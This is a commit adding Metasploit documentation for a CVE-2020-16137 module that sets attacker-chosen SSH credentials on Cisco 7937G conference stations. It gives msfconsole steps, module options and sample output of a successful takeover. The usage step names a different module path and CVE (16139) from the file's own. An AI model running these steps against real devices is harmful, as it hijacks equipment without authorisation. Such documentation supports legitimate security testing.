Add files via upload

Documentation for CVE-2020-16137

documentation/modules/exploit/linux/ssh/CVE-2020-16137.md

@@ -0,0 +1,44 @@
+## Vulnerable Application
+
+  1. Obtain a Cisco 7937G Conference Station.
+  2. Enable Web Access and SSH Access on the device.
+  3. It has been observed that based on the firmware available from Cisco, all version are likely vulnerable.
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: `use auxiliary/dos/cisco/CVE-2020-16139`
+  3. Do: `set RHOSTS 192.168.1.10`
+  4. Do: `set USER test`
+  5. Do: `set PASS test`
+  6. Do: `run`
+  7. The conference station's SSH service should now be configured with the supplied USER:PASS.
+
+## Options
+
+  1. PASS (required) - Desired password
+  2. RHOSTS (required) - Target addres
+  3. THREADS (default 1, required) - The number of concurrent threads (max one per host)
+  4. TIMEOUT (default 5, required) - Timeout in seconds before aborting
+  5. USER (required) - Desired username
+
+## Scenarios
+
+#### Successful Scenario
+```
+[*] Running for 192.168.110.209...
+[*] 192.168.110.209 - Attempting to set SSH credentials.
+[*] 192.168.110.209 - SSH attack finished!
+[*] 192.168.110.209 - Try to login using the supplied credentials test:test
+[*] 192.168.110.209 - You must specify the key exchange when connecting or the device will be DoS'd!
+[*] 192.168.110.209 - ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 test@192.168.110.209
+```
+
+#### Unsuccessful Scenario
+```
+[*] Running for 192.168.110.209...
+[*] 192.168.110.209 - Attempting to set SSH credentials.
+[-] 192.168.110.209 - Device doesn't appear to be functioning or web access is not enabled.
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```